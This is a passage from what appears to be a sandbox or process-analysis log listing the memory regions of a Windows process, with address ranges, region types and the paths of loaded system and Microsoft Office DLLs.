region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4190 start_va = 0x140000000 end_va = 0x140026fff entry_point = 0x0 region_type = private name = "private_0x0000000140000000" filename = "" Region: id = 4206 start_va = 0xb1fd970000 end_va = 0xb1fda6ffff entry_point = 0x0 region_type = private name = "private_0x000000b1fd970000" filename = "" Region: id = 4207 start_va = 0x7fff9c6b0000 end_va = 0x7fff9c88cfff entry_point = 0x7fff9c6b0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4208 start_va = 0x7fff9c9a0000 end_va = 0x7fff9ca4cfff entry_point = 0x7fff9c9a0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4216 start_va = 0xb1fd870000 end_va = 0xb1fd87ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b1fd870000" filename = "" Region: id = 4217 start_va = 0xb1fd880000 end_va = 0xb1fd886fff entry_point = 0x0 region_type = private name = "private_0x000000b1fd880000" filename = "" Region: id = 4218 start_va = 0xb1fda70000 end_va = 0xb1fdb2dfff entry_point = 0xb1fda70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4219 start_va = 0xb1fdb30000 end_va = 0xb1fdc2ffff entry_point = 0x0 region_type = private name = "private_0x000000b1fdb30000" filename = "" Region: id = 4220 start_va = 0x7ff66fad0000 end_va = 0x7ff66fbcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff66fad0000" filename = "" Region: id = 4221 start_va = 0x7ff66fbfb000 end_va = 0x7ff66fbfcfff entry_point = 0x0 region_type = private name = "private_0x00007ff66fbfb000" filename = "" Region: id = 4222 start_va = 0x7fff9bbf0000 end_va = 0x7fff9bbfefff entry_point = 0x7fff9bbf0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4223 start_va = 0x7fff9bc00000 end_va = 0x7fff9bc12fff entry_point = 0x7fff9bc00000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4224 start_va = 0x7fff9bc40000 end_va = 0x7fff9bc89fff entry_point = 0x7fff9bc40000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4225 start_va = 0x7fff9bc90000 end_va = 0x7fff9c2b7fff entry_point = 0x7fff9bc90000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4226 start_va = 0x7fff9c5a0000 end_va = 0x7fff9c652fff entry_point = 0x7fff9c5a0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4227 start_va = 0x7fff9c890000 end_va = 0x7fff9c8e0fff entry_point = 0x7fff9c890000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 4228 start_va = 0x7fff9c8f0000 end_va = 0x7fff9c995fff entry_point = 0x7fff9c8f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4229 start_va = 0x7fff9ca50000 end_va = 0x7fff9df74fff entry_point = 0x7fff9ca50000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4230 start_va = 0x7fff9e190000 end_va = 0x7fff9e2ddfff entry_point = 0x7fff9e190000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4231 start_va = 0x7fff9e450000 end_va = 0x7fff9e575fff entry_point = 0x7fff9e450000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4232 start_va = 0x7fff9e580000 end_va = 0x7fff9e7fbfff entry_point = 0x7fff9e580000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 4233 start_va = 0x7fff9e870000 end_va = 0x7fff9e90cfff entry_point = 0x7fff9e870000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4234 start_va = 0x7fff9ed80000 end_va = 0x7fff9eddafff entry_point = 0x7fff9ed80000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4235 start_va = 0x7fff9ef20000 end_va = 0x7fff9f0a4fff entry_point = 0x7fff9ef20000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4236 start_va = 0xb1fd960000 end_va = 0xb1fd966fff entry_point = 0x0 region_type = private name = "private_0x000000b1fd960000" filename = "" Region: id = 4237 start_va = 0xb1fdc30000 end_va = 0xb1fddb7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b1fdc30000" filename = "" Region: id = 4238 start_va = 0xb1fddc0000 end_va = 0xb1fddc0fff entry_point = 0x0 region_type = private name = "private_0x000000b1fddc0000" filename = "" Region: id = 4239 start_va = 0xb1fddd0000 end_va = 0xb1fddd0fff entry_point = 0x0 region_type = private name = "private_0x000000b1fddd0000" filename = "" Region: id = 4240 start_va = 0xb1fde10000 end_va = 0xb1fde1ffff entry_point = 0x0 region_type = private name = "private_0x000000b1fde10000" filename = "" Region: id = 4241 start_va = 0xb1fde20000 end_va = 0xb1fdfa0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b1fde20000" filename = "" Region: id = 4242 start_va = 0xb1fdfb0000 end_va = 0xb1fe06ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b1fdfb0000" filename = "" Region: id = 4243 start_va = 0x7fff9e040000 end_va = 0x7fff9e180fff entry_point = 0x7fff9e040000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4244 start_va = 0xb1fe070000 end_va = 0xb1fe12cfff entry_point = 0xb1fe070000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4276 start_va = 0x7fff98390000 end_va = 0x7fff983a9fff entry_point = 0x7fff98390000 region_type = mapped_file name = "msmapi32.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\SYSTEM\\MSMAPI\\1033\\MSMAPI32.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\system\\msmapi\\1033\\msmapi32.dll") Region: id = 4285 start_va = 0x73800000 end_va = 0x73814fff entry_point = 0x73800000 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Windows\\SysWOW64\\vcruntime140.dll" (normalized: "c:\\windows\\syswow64\\vcruntime140.dll") Region: id = 4286 start_va = 0x7fff961a0000 end_va = 0x7fff96291fff entry_point = 0x7fff961a0000 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 4287 start_va = 0x7fff98370000 end_va = 0x7fff98385fff entry_point = 0x7fff98370000 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Windows\\System32\\vcruntime140.dll" (normalized: "c:\\windows\\system32\\vcruntime140.dll") Region: id = 4288 start_va = 0xb1fdde0000 end_va = 0xb1fdde0fff entry_point = 0x0 region_type = private name = "private_0x000000b1fdde0000" filename = "" Region: id = 4289 start_va = 0xb1fddf0000 end_va = 0xb1fddf0fff entry_point = 0x0 region_type = private name = "private_0x000000b1fddf0000" filename = "" Region: id = 4293 start_va = 0x7fff98330000 end_va = 0x7fff98369fff entry_point = 0x7fff98330000 region_type = mapped_file name = "jitv.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\JitV.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\jitv.dll") Region: id = 4296 start_va = 0x7fff5c6d0000 end_va = 0x7fff5c6dffff entry_point = 0x0 region_type = private name = "private_0x00007fff5c6d0000" filename = "" Region: id = 4297 start_va = 0xb1fe070000 end_va = 0xb1fe3a6fff entry_point = 0xb1fe070000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4301 start_va = 0x7fff91480000 end_va = 0x7fff91703fff entry_point = 0x7fff91480000 region_type = mapped_file name = "appvisvsubsystems64.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll") Region: id = 4302 start_va = 0xb1fde00000 end_va = 0xb1fde00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b1fde00000" filename = "" Region: id = 4307 start_va = 0x74160000 end_va = 0x74178fff entry_point = 0x74160000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 4308 start_va = 0x7fff91200000 end_va = 0x7fff91477fff entry_point = 0x7fff91200000 region_type = mapped_file name = "c2r64.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll") Region: id = 4309 start_va = 0x7fff9b1a0000 end_va = 0x7fff9b1befff entry_point = 0x7fff9b1a0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 4344 start_va = 0x7fff9ede0000 end_va = 0x7fff9ee9dfff entry_point = 0x7fff9ede0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4356 start_va = 0xb1fe3b0000 end_va = 0xb1fe3b2fff entry_point = 0xb1fe3b0000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4357 start_va = 0xb1fe3c0000 end_va = 0xb1fe3c8fff entry_point = 0xb1fe3c0000 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4358 start_va = 0xb1fe3b0000 end_va = 0xb1fe3b2fff entry_point = 0xb1fe3b0000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4359 start_va = 0xb1fe3c0000 end_va = 0xb1fe3c8fff entry_point = 0xb1fe3c0000 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4360 start_va = 0xb1fe3b0000 end_va = 0xb1fe3b0fff entry_point = 0x0 region_type = private name = "private_0x000000b1fe3b0000" filename = "" Region: id = 4361 start_va = 0xb1fe3b0000 end_va = 0xb1fe3b0fff entry_point = 0x0 region_type = private name = "private_0x000000b1fe3b0000" filename = "" Region: id = 4362 start_va = 0xb1fe3b0000 end_va = 0xb1fe4affff entry_point = 0x0 region_type = private name = "private_0x000000b1fe3b0000" filename = "" Region: id = 4363 start_va = 0x7ff66fbf9000 end_va = 0x7ff66fbfafff entry_point = 0x0 region_type = private name = "private_0x00007ff66fbf9000" filename = "" Region: id = 4366 start_va = 0xb1fe4b0000 end_va = 0xb1fe4c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b1fe4b0000" filename = "" Region: id = 4369 start_va = 0x7fff5f240000 end_va = 0x7fff5f24ffff entry_point = 0x0 region_type = private name = "private_0x00007fff5f240000" filename = "" Region: id = 4372 start_va = 0x7fff8f1c0000 end_va = 0x7fff8fa6bfff entry_point = 0x7fff8f1c0000 region_type = mapped_file name = "olmapi32.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\OLMAPI32.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\olmapi32.dll") Region: id = 4375 start_va = 0xb1fdb30000 end_va = 0xb1fdb31fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b1fdb30000" filename = "" Region: id = 4376 start_va = 0x7fff8fbe0000 end_va = 0x7fff8fd88fff entry_point = 0x7fff8fbe0000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10240.16384_none_89a94c179af51f83\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10240.16384_none_89a94c179af51f83\\gdiplus.dll") Region: id = 4379 start_va = 0x73f20000 end_va = 0x73f2efff entry_point = 0x73f20000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll") Region: id = 4380 start_va = 0x7fff9a1b0000 end_va = 0x7fff9a1c2fff entry_point = 0x7fff9a1b0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 4383 start_va = 0x73960000 end_va = 0x739adfff entry_point = 0x73960000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\SysWOW64\\wevtapi.dll" (normalized: "c:\\windows\\syswow64\\wevtapi.dll") Region: id = 4384 start_va = 0x7fff98ec0000 end_va = 0x7fff98f24fff entry_point = 0x7fff98ec0000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 4387 start_va = 0x73780000 end_va = 0x737f0fff entry_point = 0x73780000 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\SystemX86\\msvcp140.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\systemx86\\msvcp140.dll") Region: id = 4388 start_va = 0x7fff8f030000 end_va = 0x7fff8f0d6fff entry_point = 0x7fff8f030000 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\System\\msvcp140.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\system\\msvcp140.dll") Region: id = 4391 start_va = 0x73ee0000 end_va = 0x73efafff entry_point = 0x73ee0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 4392 start_va = 0x7fff9ba10000 end_va = 0x7fff9ba37fff entry_point = 0x7fff9ba10000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4394 start_va = 0xb1fe4b0000 end_va = 0xb1fe5affff entry_point = 0x0 region_type = private name = "private_0x000000b1fe4b0000" filename = "" Region: id = 4399 start_va = 0x7fff92c10000 end_va = 0x7fff92e83fff entry_point = 0x7fff92c10000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 4400 start_va = 0xb1fdb40000 end_va = 0xb1fdb40fff entry_point = 0xb1fdb40000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 4401 start_va = 0xb1fdb50000 end_va = 0xb1fdb51fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b1fdb50000" filename = "" Region: id = 4402 start_va = 0x7fff92c00000 end_va = 0x7fff92c09fff entry_point = 0x7fff92c00000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 4403 start_va = 0xb1fdb60000 end_va = 0xb1fdbdffff entry_point = 0x0 region_type = private name = "private_0x000000b1fdb60000" filename = "" Region: id = 4404 start_va = 0x745b0000 end_va = 0x74608fff entry_point = 0x745b0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4405 start_va = 0x7fff9ba40000 end_va = 0x7fff9baaafff entry_point = 0x7fff9ba40000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4410 start_va = 0xb1fe5b0000 end_va = 0xb1fe685fff entry_point = 0xb1fe5b0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 4411 start_va = 0x7fff92c00000 end_va = 0x7fff92c09fff entry_point = 0x7fff92c00000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 4412 start_va = 0x7fff92c00000 end_va = 0x7fff92c09fff entry_point = 0x7fff92c00000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 4413 start_va = 0x7fff92c00000 end_va = 0x7fff92c09fff entry_point = 0x7fff92c00000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 4417 start_va = 0x7fff92c00000 end_va = 0x7fff92c09fff entry_point = 0x7fff92c00000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 4419 start_va = 0xb1fdb40000 end_va = 0xb1fdb42fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b1fdb40000" filename = "" Region: id = 4420 start_va = 0xb1fe5b0000 end_va = 0xb1fe62ffff entry_point = 0x0 region_type = private name = "private_0x000000b1fe5b0000" filename = "" Region: id = 4421 start_va = 0x7ff66fbfb000 end_va = 0x7ff66fbfcfff entry_point = 0x0 region_type = private name = "private_0x00007ff66fbfb000" filename = "" Region: id = 4422 start_va = 0x7fff8c750000 end_va = 0x7fff8cdc8fff entry_point = 0x7fff8c750000 region_type = mapped_file name = "mso20win32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso20win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso20win32client.dll") Region: id = 4427 start_va = 0xb1fdb60000 end_va = 0xb1fdb6ffff entry_point = 0x0 region_type = private name = "private_0x000000b1fdb60000" filename = "" Region: id = 4428 start_va = 0xb1fdb70000 end_va = 0xb1fdb72fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b1fdb70000" filename = "" Region: id = 4429 start_va = 0xb1fdbd0000 end_va = 0xb1fdbdffff entry_point = 0x0 region_type = private name = "private_0x000000b1fdbd0000" filename = "" Region: id = 4430 start_va = 0xb1fe680000 end_va = 0xb1fe69ffff entry_point = 0x0 region_type = private name = "private_0x000000b1fe680000" filename = "" Region: id = 4431 start_va = 0x7fff8b640000 end_va = 0x7fff8be50fff entry_point = 0x7fff8b640000 region_type = mapped_file name = "mso30win32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso30win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso30win32client.dll") Region: id = 4439 start_va = 0xb1fdb80000 end_va = 0xb1fdb82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b1fdb80000" filename = "" Region: id = 4440 start_va = 0x7fff8a760000 end_va = 0x7fff8b55bfff entry_point = 0x7fff8a760000 region_type = mapped_file name = "mso40uiwin32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso40UIwin32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso40uiwin32client.dll") Region: id = 4443 start_va = 0x73940000 end_va = 0x7395cfff entry_point = 0x73940000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 4444 start_va = 0xb1fdb90000 end_va = 0xb1fdb92fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b1fdb90000" filename = "" Region: id = 4445 start_va = 0x7fff8c440000 end_va = 0x7fff8c519fff entry_point = 0x7fff8c440000 region_type = mapped_file name = "mso50win32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso50win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso50win32client.dll") Region: id = 4446 start_va = 0x7fff99c60000 end_va = 0x7fff99c81fff entry_point = 0x7fff99c60000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 4447 start_va = 0xb1fdba0000 end_va = 0xb1fdba2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b1fdba0000" filename = "" Region: id = 4448 start_va = 0x7fff87ae0000 end_va = 0x7fff889ccfff entry_point = 0x7fff87ae0000 region_type = mapped_file name = "mso98win32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso98win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso98win32client.dll") Region: id = 4453 start_va = 0xb1fdbb0000 end_va = 0xb1fdbb1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b1fdbb0000" filename = "" Region: id = 4454 start_va = 0x7fff83100000 end_va = 0x7fff84dfffff entry_point = 0x7fff83100000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso.dll") Region: id = 4464 start_va = 0x733f0000 end_va = 0x7377bfff entry_point = 0x733f0000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll") Region: id = 4465 start_va = 0x73930000 end_va = 0x73937fff entry_point = 0x73930000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 4466 start_va = 0xb1fdbc0000 end_va = 0xb1fdbc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b1fdbc0000" filename = "" Region: id = 4467 start_va = 0xb1fe6a0000 end_va = 0xb1fe79ffff entry_point = 0x0 region_type = private name = "private_0x000000b1fe6a0000" filename = "" Region: id = 4468 start_va = 0x7ff66fbf7000 end_va = 0x7ff66fbf8fff entry_point = 0x0 region_type = private name = "private_0x00007ff66fbf7000" filename = "" Region: id = 4469 start_va = 0x7fff92c00000 end_va = 0x7fff92c09fff entry_point = 0x7fff92c00000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 4470 start_va = 0x7fff92e90000 end_va = 0x7fff931ccfff entry_point = 0x7fff92e90000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 4474 start_va = 0x72f60000 end_va = 0x733e7fff entry_point = 0x72f60000 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\SysWOW64\\d2d1.dll" (normalized: "c:\\windows\\syswow64\\d2d1.dll") Region: id = 4475 start_va = 0xb1fe7a0000 end_va = 0xb1fe9c0fff entry_point = 0xb1fe7a0000 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 4476 start_va = 0x7fff95aa0000 end_va = 0x7fff95fe4fff entry_point = 0x7fff95aa0000 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 4481 start_va = 0x72ee0000 end_va = 0x72f5dfff entry_point = 0x72ee0000 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\SysWOW64\\dxgi.dll" (normalized: "c:\\windows\\syswow64\\dxgi.dll") Region: id = 4482 start_va = 0x73a60000 end_va = 0x73aa3fff entry_point = 0x73a60000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 4483 start_va = 0x7fff99910000 end_va = 0x7fff999abfff entry_point = 0x7fff99910000 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 4484 start_va = 0x7fff9b950000 end_va = 0x7fff9b9a7fff entry_point = 0x7fff9b950000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 4485 start_va = 0x7fff9a820000 end_va = 0x7fff9a847fff entry_point = 0x7fff9a820000 region_type = mapped_file name = "rmclient.dll" filename = "\\Windows\\System32\\rmclient.dll" (normalized: "c:\\windows\\system32\\rmclient.dll") Region: id = 4486 start_va = 0xb180000000 end_va = 0xb1846f1fff entry_point = 0xb180000000 region_type = mapped_file name = "msores.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSORES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msores.dll") Region: id = 4487 start_va = 0xb184700000 end_va = 0xb18477ffff entry_point = 0x0 region_type = private name = "private_0x000000b184700000" filename = "" Region: id = 4488 start_va = 0xb184780000 end_va = 0xb1847fffff entry_point = 0x0 region_type = private name = "private_0x000000b184780000" filename = "" Region: id = 4489 start_va = 0xb184800000 end_va = 0xb184812fff entry_point = 0xb184800000 region_type = mapped_file name = "msointl30.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\1033\\msointl30.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\1033\\msointl30.dll") Region: id = 4490 start_va = 0xb1fe9d0000 end_va = 0xb1febcffff entry_point = 0x0 region_type = private name = "private_0x000000b1fe9d0000" filename = "" Region: id = 4491 start_va = 0xb1febd0000 end_va = 0xb1ff0c7fff entry_point = 0xb1febd0000 region_type = mapped_file name = "mso40uires.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO40UIRES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso40uires.dll") Region: id = 4492 start_va = 0xb1ff0d0000 end_va = 0xb1ffec8fff entry_point = 0xb1ff0d0000 region_type = mapped_file name = "mso99lres.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO99LRES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso99lres.dll") Region: id = 4493 start_va = 0x7ff66fbf3000 end_va = 0x7ff66fbf4fff entry_point = 0x0 region_type = private name = "private_0x00007ff66fbf3000" filename = "" Region: id = 4494 start_va = 0x7ff66fbf5000 end_va = 0x7ff66fbf6fff entry_point = 0x0 region_type = private name = "private_0x00007ff66fbf5000" filename = "" Region: id = 4495 start_va = 0x7fff5e1b0000 